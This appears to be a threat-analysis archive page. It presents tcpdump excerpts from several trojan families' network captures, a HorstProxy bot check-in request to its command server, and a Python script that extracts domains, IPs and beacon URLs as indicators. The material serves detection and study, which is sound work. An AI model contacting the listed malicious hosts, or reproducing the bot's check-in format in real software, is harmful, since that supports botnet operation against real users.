Category Archives: Other Trojan Families

Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

Download Kaixin PCAP Sample: kaixin.pcap

2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0
2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win…


XPaj Malware Trojan Packet Analysis Download PCAP Sample

Download XPAJ PCAP Sample: xpaj.pcap

2012-05-02 16:18:32.092414 IP 192.168.254.194.49734 > 8.8.8.8.53: 34837+ A? nortiniolosto.com. (35)
2012-05-02 16:18:32.235179 IP 8.8.8.8.53 > 192.168.254.194.49734: 34837 1/0/0 A 208.91.198.30 (51)
2012-05-02 16:18:32.240585 IP 192.168.254.194.64504 > 8.8.8.8.53: 55906+ A? msn.com. (25)
2012-05-02 16:18:32.256362 IP 8.8.8.8.53 > 192.168.254.194.64504: 55906 1/0/0 A 65.55.206.203 (41)
2012-05-02 16:18:32.260152…


Nettraveler Net Traveler Data Personal Information Hijacking Malware Trojan PCAP Traffic Sample

Download raw PCAP of NetTraveler: nettravler.pcap

2013-01-05 22:43:42.583158 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31)
2013-01-05 22:43:43.577967 IP 172.16.253.130.53 > 8.8.8.8.53: 11908+ A? www.gami1.com. (31)
2013-01-05 22:43:43.578188 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31)
2013-01-05 22:43:44.085958 IP 4.2.2.2.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47)
2013-01-05 22:43:44.085985 IP 4.2.2.2.53…

Note that the lookup for www.gami1.com is sent from source port 53 and repeated with the same transaction id (11908) to two resolvers within about a second before 4.2.2.2 answers with 110.34.193.13.


HISTORICAL Malware Sample – TIJ – Traffic Sample Indicators Analysis

2013-02-03 21:49:49.176564 IP 8.8.8.8.53 > 172.16.253.130.53: 34738 1/0/0 A 174.139.45.210 (50)
2013-02-03 21:49:49.179485 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2013-02-03 21:49:49.284041 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 2525759170, ack 2948849308, win 64240, length 0
2013-02-03 21:49:49.358483 IP 4.2.2.2.53 > 172.16.253.130.53: 34738 1/0/0…

The answer payload carries the queried name siqiao.gnway.net; the host immediately opens TCP/80 to the resolved address 174.139.45.210 and receives a RST.


HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

2013-05-12 14:32:23.969210 IP 172.16.253.129.1057 > 69.43.161.152.80: Flags [P.], seq 1:126, ack 1, win 64240, length 125
GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1
User-Agent: Mozilla/5.0
Host: ldark.com

2013-05-12 14:32:23.969386 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [.], ack 126, win 64240, length 0
2013-05-12 14:32:24.102970 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [FP.], seq 1:290, ack 126, win 64240, length…

The check-in reports the bot's own internal address and a SOCKS listener port (41080) in the query string, together with the OS and country, and uses the bare User-Agent "Mozilla/5.0" with Host ldark.com.
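One way to pull indicators out of tcpdump listings like the excerpts above, as an added Python example rather than the archive's own tooling: it parses the summary lines for DNS queries and answers (correlated by transaction id, which also copes with retries that reuse one id as in the NetTraveler capture), extracts an HTTP check-in request with its query parameters, and flags a beacon that reports the client's own address in the URL, as the HorstProxy request does (ip=172.16.253.129 from source 172.16.253.129). The sample input is copied from the XPaj and HorstProxy excerpts with the hex/ASCII dump columns removed; the function names and the indicator output format are this example's own.

```python
"""Extract indicators from tcpdump text such as the excerpts on this page.

Added example, not the archive's own tooling. Expects tcpdump summary
lines plus any printable HTTP payload lines; the hex/ASCII dump columns
are assumed to have been stripped already.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample: lines copied from the XPaj and HorstProxy excerpts
# on this page, dump residue removed.
SAMPLE = """\
2012-05-02 16:18:32.092414 IP 192.168.254.194.49734 > 8.8.8.8.53: 34837+ A? nortiniolosto.com. (35)
2012-05-02 16:18:32.235179 IP 8.8.8.8.53 > 192.168.254.194.49734: 34837 1/0/0 A 208.91.198.30 (51)
2012-05-02 16:18:32.240585 IP 192.168.254.194.64504 > 8.8.8.8.53: 55906+ A? msn.com. (25)
2012-05-02 16:18:32.256362 IP 8.8.8.8.53 > 192.168.254.194.64504: 55906 1/0/0 A 65.55.206.203 (41)
2013-05-12 14:32:23.969210 IP 172.16.253.129.1057 > 69.43.161.152.80: Flags [P.], seq 1:126, ack 1, win 64240, length 125
GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1
User-Agent: Mozilla/5.0
Host: ldark.com
"""

PKT = re.compile(r"^(?P<ts>\S+ \S+) IP (?P<src>\S+)\.(?P<sport>\d+) > "
                 r"(?P<dst>\S+)\.(?P<dport>\d+): (?P<rest>.*)$")
# "34837+ A? nortiniolosto.com. (35)"; only A queries are handled here
DNS_Q = re.compile(r"^(?P<txid>\d+)\+ A\? (?P<name>\S+) \(\d+\)$")
# "34837 1/0/0 A 208.91.198.30 (51)" or "11908 NXDomain 0/1/0 (31)"
DNS_A = re.compile(r"^(?P<txid>\d+)(?: (?P<rcode>\w+))? \d+/\d+/\d+(?P<answers>.*) \(\d+\)$")
IPV4 = re.compile(r"\bA (\d{1,3}(?:\.\d{1,3}){3})")
REQ = re.compile(r"^(?P<method>GET|POST|HEAD|PUT) (?P<target>\S+) HTTP/1\.[01]$")
HDR = re.compile(r"^(?P<k>[A-Za-z-]+): (?P<v>.*)$")


def parse(text: str) -> dict:
    """Return {"dns": {name: [resolved ips]}, "http": [request dicts]}."""
    pending: Dict[str, str] = {}    # txid -> queried name; never popped, so
    dns: Dict[str, List[str]] = {}  # answers to retried queries still match
    http: List[dict] = []
    last_pkt: dict = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].rstrip()
        pkt = PKT.match(line)
        if pkt:
            last_pkt = pkt.groupdict()
            rest = pkt["rest"]
            q = DNS_Q.match(rest)
            a = DNS_A.match(rest)
            if q:
                name = q["name"].rstrip(".")
                pending[q["txid"]] = name
                dns.setdefault(name, [])
            elif a and a["txid"] in pending:
                hits = dns[pending[a["txid"]]]
                hits.extend(ip for ip in IPV4.findall(a["answers"]) if ip not in hits)
            i += 1
            continue
        req = REQ.match(line)
        if req:
            # Payload follows its summary line, so attribute it to last_pkt.
            beacon = {"method": req["method"], "target": req["target"],
                      "src": last_pkt.get("src"), "dst": last_pkt.get("dst"),
                      "headers": {}}
            i += 1
            while i < len(lines) and (h := HDR.match(lines[i].rstrip())):
                beacon["headers"][h["k"].lower()] = h["v"]
                i += 1
            url = urlsplit(req["target"])
            beacon["path"] = url.path
            beacon["params"] = {k: v[0] for k, v in parse_qs(url.query).items()}
            http.append(beacon)
            continue
        i += 1
    return {"dns": dns, "http": http}


def leaks_client_ip(beacon: dict) -> bool:
    """True when the request echoes the sender's own address in a URL
    parameter (the HorstProxy pattern: ip=172.16.253.129 from that host)."""
    return beacon.get("src") is not None and beacon["src"] in beacon["params"].values()


def iocs(text: str) -> List[str]:
    """Flatten to a sorted indicator list: domains, resolved IPs, beacon URLs."""
    parsed = parse(text)
    out = []
    for name, ips in parsed["dns"].items():
        out.append(f"domain:{name}")
        out.extend(f"ip:{ip}" for ip in ips)
    for b in parsed["http"]:
        host = b["headers"].get("host") or b["dst"]
        out.append(f"url:http://{host}{b['path']}")
        if b["dst"]:
            out.append(f"ip:{b['dst']}")
    return sorted(set(out))


if __name__ == "__main__":
    for ioc in iocs(SAMPLE):
        print(ioc)
    for b in parse(SAMPLE)["http"]:
        print("client-ip-in-url:", leaks_client_ip(b), b["params"])
```

Every queried name ends up in the list, so triage (for example separating the msn.com lookup that follows the nortiniolosto.com query in the XPaj capture from the suspicious ones) is still the analyst's job; the point of the script is to make the DNS-to-IP pairing and the beacon parameters explicit instead of reading them out of a dump by eye.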
